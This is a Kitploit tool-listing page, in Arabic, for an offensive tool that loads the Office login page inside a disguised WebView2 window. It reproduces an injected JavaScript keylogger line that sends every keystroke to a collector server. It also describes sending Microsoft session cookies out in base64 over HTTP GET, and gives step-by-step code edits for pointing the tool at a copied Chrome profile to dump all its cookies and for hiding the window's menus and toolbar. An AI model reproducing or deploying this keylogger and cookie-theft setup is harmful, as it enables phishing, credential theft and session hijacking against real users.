Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
WebView2-Cookie-Stealer — يقوم بحقن مسجل ضغطات المفاتيح بلغة JavaScript في صفحات WebView2 لالتقاط ضغطات المفاتيح واستخراج ملفات تعريف الارتباط من جلسات مصادقة Microsoft عبر طلبات HTTP GET. | Kitploit
أدوات/GitHubGitHub/mrd0x/webview2-cookie-stealer
هجمات كلمات المروراستغلال تطبيقات الويبتسريب البياناتجمع المعلوماتالتصيد الاحتيالي
GitHubmrd0x/webview2-cookie-stealer

WebView2-Cookie-Stealer

يقوم بحقن مسجل ضغطات المفاتيح بلغة JavaScript في صفحات WebView2 لالتقاط ضغطات المفاتيح واستخراج ملفات تعريف الارتباط من جلسات مصادقة Microsoft عبر طلبات HTTP GET.

عرض المستودع
26658منذ 4 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

تدوينة

يرجى قراءة هذه التدوينة للحصول على مزيد من المعلومات.

الكود المصدري

هذا الكود هو نسخة معدلة من كود WebView2 من مايكروسوفت. يمكن تنظيف الكود الحالي وتحسينه بشكل كبير.

عرض توضيحي

مثال الإطلاق

مثال الاستخدام

الاستخدام

تم الاختبار على ويندوز 10 و 11.

عند تنفيذ الملف الثنائي، يتم تحميل https://office.com/login. يتم حقن مسجل ضربات لوحة المفاتيح بلغة JavaScript في كل صفحة ويتم إرسال ضربات المفاتيح إلى http://127.0.0.1:8080. علاوة على ذلك، بعد أن يقوم المستخدم بتسجيل الدخول بنجاح، يتم ترميز ملفات تعريف الارتباط لـ login.microsoftonline.com بصيغة base64 وإرسالها إلى http://127.0.0.1:8080 عبر طلب GET HTTP.

تعديل JavaScript

إذا كنت ترغب في تعديل JavaScript، فالكود الذي يحتاج إلى التغيير موضح أدناه في السطر 1096 في ملف AppWindow.cpp.

root@kitploit:~
coreWebView2->AddScriptToExecuteOnDocumentCreated(L"var link = \"http://127.0.0.1:8080/keylog?k=\";var l = \"\";document.onkeypress = function (e){l += e.key;var req = new XMLHttpRequest();req.open(\"GET\",link.concat(l), true);req.send();}", nullptr);

سرقة ملفات تعريف الارتباط الخاصة بـ Chrome

يتيح WebView2 الإطلاق باستخدام مجلد بيانات مستخدم (UDF) موجود بدلاً من إنشاء مجلد جديد. يحتوي UDF على جميع كلمات المرور والجلسات والإشارات المرجعية وما إلى ذلك. يوجد UDF الخاص بـ Chrome في المسار C:\Users\<username>\AppData\Local\Google\Chrome\User Data. يمكننا ببساطة إخبار WebView2 ببدء المثيل باستخدام هذا الملف الشخصي وعند الإطلاق استخراج جميع ملفات تعريف الارتباط ونقلها إلى خادم المهاجم.

العيب الوحيد هو أن WebView2 يبحث عن مجلد باسم EBWebView بدلاً من User Data (لست متأكدًا لماذا). قم بنسخ مجلد User Data وإعادة تسميته إلى EBWebView.

التغييرات المطلوبة

  • في السطر 41 في ملف app.cpp:

    • قم بتغيير std::wstring userDataFolder(L""); إلى std::wstring userDataFolder(L"C:\\Path\\To\\Temp");
    • يجب أن يحتوي المجلد المحدد على مجلد EBWebView الذي سيقرأ منه WebView2.
  • في السطر 40 في ملف ScenarioCookieManagement.cpp:

    • قم بتغيير GetCookiesHelper(L"https://login.microsoftonline.com"); إلى GetCookiesHelper(L"");

عند استدعاء GetCookiesHelper دون توفير أي موقع ويب، فإنه سيستخرج جميع ملفات تعريف الارتباط.

ملاحظة: لن يعمل هذا مع التطبيق الحالي إذا كان هناك عدد كبير من ملفات تعريف الارتباط لأن التطبيق يرسلها باستخدام طلب GET مما له حد طول.

الدوال المهمة

إذا كنت ترغب في إجراء تعديلات على الملف الثنائي، فستجد معلومات حول الدوال المهمة أدناه.

  • AppStartPage.cpp - تحتوي الدالة GetUri() على عنوان URL الذي يتم تحميله عند تنفيذ الملف الثنائي.
  • ScenarioCookieManagement.cpp - تحتوي الدالة SendCookies() على عنوان IP والمنفذ حيث يتم إرسال ملفات تعريف الارتباط.
  • AppWindow.cpp - تنتظر الدالة CallCookieFunction() حتى يبدأ عنوان URL بـ https://www.office.com/?auth= ثم تستدعي ScenarioCookieManagement::GetCookiesHelper(L"https://login.microsoftonline.com")
  • WebView2APISample.rc - تغييرات تجميلية
    • قم بإزالة شريط القوائم بتعيين جميع قيم POPUP إلى "".
    • قم بتغيير IDS_APP_TITLE و IDC_WEBVIEW2APISAMPLE. هذا هو اسم التطبيق في شريط العنوان.
    • قم بتغيير IDI_WEBVIEW2APISAMPLE و IDI_WEBVIEW2APISAMPLE_INPRIVATE و IDI_SMALL. تشير هذه إلى ملف وهو أيقونة هذا التطبيق.
تنزيل الأداة
.ico
  • Toolbar.cpp - يجب تعيين itemHeight إلى 0 لإزالة القائمة العلوية. تمت معالجة هذا بالفعل في هذا الكود.
  • AppWindow.cpp - يجب تعليق LoadImage() (أي جعلها غير فعالة). هذا يخفي صورة الشاشة الزرقاء. تمت معالجة هذا بالفعل في هذا الكود.
  • App.cpp - قم بتغيير قيمة المعامل الأخير في new AppWindow(creationModeId, WebViewCreateOption(), initialUri, userDataFolder, false); إلى true. هذا يخفي شريط الأدوات. تمت معالجة هذا بالفعل في هذا الكود.